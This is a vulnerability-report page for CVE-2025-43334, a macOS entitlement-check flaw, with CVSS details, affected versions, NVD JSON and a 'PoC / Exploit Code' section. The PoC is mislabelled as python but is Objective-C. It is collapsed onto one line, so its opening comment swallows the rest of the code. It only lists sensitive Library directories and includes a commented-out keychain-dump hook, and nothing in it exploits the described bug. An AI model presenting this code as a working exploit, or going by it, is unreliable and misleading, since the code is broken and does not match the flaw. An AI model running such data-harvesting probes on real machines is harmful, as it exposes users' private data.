Security Vulnerability Report
中文
CVE-2025-43334 CVSS 5.5 MEDIUM

CVE-2025-43334

Published: 2025-11-04 02:15:40
Last Modified: 2026-04-02 19:20:29

Description

This issue was addressed with additional entitlement checks. This issue is fixed in macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1. An app may be able to access user-sensitive data.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE
Apple macOS Sequoia < 15.7.2
Apple macOS Sonoma < 14.8.2
Apple macOS Tahoe < 26.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2025-43334 PoC - macOS Entitlements Bypass // This PoC demonstrates attempting to access sensitive user data // Note: This is a conceptual PoC for educational purposes only #include <Foundation/Foundation.h> int main(int argc, const char * argv[]) { @autoreleasepool { // Attempt to access sensitive data paths NSArray *sensitivePaths = @[ @"~/Library/Application Support/", @"~/Library/Preferences/", @"~/Library/Accounts/", @"/Library/Application Support/" ]; NSFileManager *fileManager = [NSFileManager defaultManager]; NSError *error = nil; // List contents of sensitive directories for (NSString *path in sensitivePaths) { NSString *expandedPath = [path stringByExpandingTildeInPath]; NSArray *contents = [fileManager contentsOfDirectoryAtPath:expandedPath error:&error]; if (contents) { NSLog(@"Accessible: %@", expandedPath); for (NSString *item in contents) { NSLog(@" - %@", item); } } } // Check for Keychain access (if entitlements allow) // [KeychainAccessHelper attemptKeychainDump]; return 0; } } /* Detection Method: 1. Monitor application entitlement requests 2. Check for unauthorized data access attempts 3. Verify entitlement validation in system logs Required Fix: - Apply macOS Sequoia 15.7.2, Sonoma 14.8.2, or Tahoe 26.1 - Review application entitlement requirements */

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43334", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:40.220", "lastModified": "2026-04-02T19:20:29.097", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "This issue was addressed with additional entitlement checks. This issue is fixed in macOS Sequoia 15.7.2, macOS Sonoma 14.8.2, macOS Tahoe 26.1. An app may be able to access user-sensitive data."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "14.0", "versionEndExcluding": "14.8.2", "matchCriteriaId": "9827CBDC-8C03-46BA-B534-8533F0975804"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0", "versionEndExcluding": "15.7.2", "matchCriteriaId": "4BE8199E-63D1-496C-B107-52853CFC2311"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125635", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125636", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}